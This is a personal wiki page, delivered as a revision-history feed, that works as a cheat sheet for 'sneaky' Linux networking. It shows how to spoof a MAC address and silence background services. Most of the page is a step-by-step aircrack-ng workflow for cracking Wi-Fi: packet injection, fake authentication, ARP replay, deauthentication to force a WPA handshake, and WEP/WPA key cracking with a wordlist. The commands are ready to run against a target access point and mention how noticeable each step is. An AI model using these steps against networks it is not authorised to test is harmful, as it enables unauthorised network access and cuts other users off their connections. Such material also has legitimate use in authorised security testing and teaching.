https://beardedmaker.com/wiki/index.php?action=history&feed=atom&title=Linux_Network_Config_%28for_being_sneaky%29Linux Network Config (for being sneaky) - Revision history2026-04-26T23:46:14ZRevision history for this page on the wikiMediaWiki 1.27.4https://beardedmaker.com/wiki/index.php?title=Linux_Network_Config_(for_being_sneaky)&diff=2724&oldid=prevBeard at 19:19, 28 June 20182018-06-28T19:19:40Z<p></p>
<p><b>New page</b></p><div><pre><br />
exit #TO PREVENT EXECUTION OF THIS FILE<br />
<br />
ifconfig wlan0 down<br />
ifconfig wlan0 hw ether 00:11:22:33:44:55<br />
ifconfig wlan0 up<br />
<br />
macchanger -A wlan0 - set random vendor MAC<br />
-a - another random vendor MAC<br />
-r - random MAC<br />
-p - reset to original MAC<br />
-m xx:xx:xx:xx:xx:xx - set MAC<br />
-l - list known vendors<br />
-s - show current MAC<br />
<br />
<br />
daemons to shut off:<br />
smbd<br />
nmbd<br />
clamav-freshclam<br />
network-manager<br />
unattended-upgrades<br />
<br />
(packet sniff to find out if anything else is generating traffic from you machine)<br />
<br />
<br />
promiscuous mode:<br />
ifconfig wlan0 promisc<br />
remove:<br />
ifconfig wlan0 -promisc<br />
<br />
<br />
monitor mode:<br />
ifconfig wlan0 down<br />
iwconfig wlan0 mode monitor<br />
ifconfig wlan0 up<br />
<br />
ifconfig wlan0 down<br />
iwconfig wlan0 mode managed<br />
ifconfig wlan0 up<br />
<br />
<br />
ifconfig wlan0 192.168.1.1 netmask 255.255.255.0<br />
<br />
this does not always work, for instance with a wireless card using ndiswrapper<br />
you need to change your .conf file withing your driver's folder located in<br />
/etc/ndiswrapper/<br />
<br />
which reportedly works, you simply change the line mac_address|XX:XX:XX:XX:XX:XX<br />
to mac_address|<br />
<br />
I do not currently have that working on gentoo linux at the moment however<br />
it's worked for a couple people out there and it -is- the method listed for the wiki.<br />
simply bringing the wlan0 down and ifconfig wlan0 hw ether <br />
does not work with my gentoo build using ndiswrapper it seems to be overwritten w/ the <br />
real mac address repeatedly.<br />
<br />
/etc/sysconfig/network-scripts/ifcfg - interface configurations<br />
<br />
service network restart - self explanitory<br />
service networking restart - self explanitory<br />
<br />
dhcpcd wlan0 - set wlan0 to dhcp<br />
dhclient -4 -s 11.22.33.44 wlan0 - set interface to dhcp (ip4) from dhcp server 11.22.33.44<br />
<br />
################ WEP/WPA ###################<br />
<br />
SPOOF<br />
spoof wlan0 and mon0<br />
<br />
INTERFACE<br />
airmon-ng start wlan0 - creates new interface called mon0 that can monitor and inject<br />
airmon-ng stop mon0 - removes mon0<br />
<br />
MONITOR<br />
airodump-ng mon0 - monitors all channels<br />
channels 1 -14 used for 802.11b & g. <br />
channels 36-149 used for 802.11a.<br />
MB = speed. 11 is 802.11b and 54 is 802.11g<br />
<br />
PACKETS<br />
every packet contains initialization vector (IV). # of IVs captured are under #Data.<br />
PTW cracking:00:17:3F:BD:4F:E2<br />
64 bit - capture 10k IVs.<br />
128 bit - capture 500k IVs.<br />
FMS/Korek cracking:<br />
64 bit - capture 250k IVs.<br />
128 bit - capture 1.5m IVs.<br />
<br />
TEST INJECTION<br />
aireplay-ng -9 -e ssid -a 00:00:00:00:00:00 mon0<br />
-9 - test<br />
-e essid name<br />
-a AP address<br />
<br />
ATTACK/INJECTION TEST<br />
aireplay-ng -9 mon0<br />
-i wlan1 - mimics an AP to produce different results<br />
<br />
CAPTURE<br />
airodump-ng -c 11 -d 00:00:00:00:00:00 -w dump mon0<br />
-d - bssid of target<br />
listens to channel 11 on access point with bssid and dumps in file called "dump".<br />
channel is optional.<br />
<br />
PRODUCE IVs (FAKE AUTHENTICATION)<br />
aireplay-ng -1 0 -e ssid -a 00:00:00:00:00:00 -h 11:11:11:11:11:11 mon0<br />
produces a lot of arp requests and traffic. Noticable. <br />
-1 - fake authentication (delay = 0)<br />
-a - bssid<br />
-h - your mac address<br />
if doesn't work, try -1 6000 -o 1 -q10<br />
also put it in a loop (about 2.5 sec)<br />
may also produce handshake<br />
<br />
PRODUCE TRAFFIC<br />
while running airodump-ng...<br />
aireplay-ng --arpreplay -b 00:00:00:00:00:00 -h 11:11:11:11:11:11 mon0<br />
-b - bssid of AP<br />
-h - your mac address<br />
if packets stop flowing, reduce the replay speed wih -x <packets/sec>. default 50.<br />
also, try generating ARP by pinging non existant ip address.<br />
<br />
DISCONNECT PACKET FOR WPA HANDSHAKE<br />
while running airodump-ng...<br />
aireplay-ng -0 1 -a 00:00:00:00:00:00 -c 11:11:11:11:11:11 mon0<br />
-0 - deauth (followed by number of deauths to send)<br />
-a bssid of AP<br />
-c host to disconnect<br />
<br />
CRACKING<br />
aircrack-ng -b 00:00:00:00:00:00 dump*.cap<br />
-b bssid of AP (optional if capture was from only one AP)<br />
capture file (put * to use all capture files)<br />
-n - 64 or 128 bit key<br />
-K alternative parameter (FMS/Korek method)<br />
default method is PTW<br />
<br />
FOR WPA/WPA2<br />
run aircrack-ng with "-w word.lst" to brute force using a dictionary called word.lst.<br />
aircrack-ng comes with a default list located in /usr/share/doc/aircrack-ng/examples/password.lst.gz. <br />
<br />
CHANNEL<br />
if having trouble with interface being in a fixed channel:<br />
ifconfig wlan0 down<br />
iwconfig wlan0 mode monitor<br />
ifconfig wlan0 up<br />
<br />
</pre></div>Beard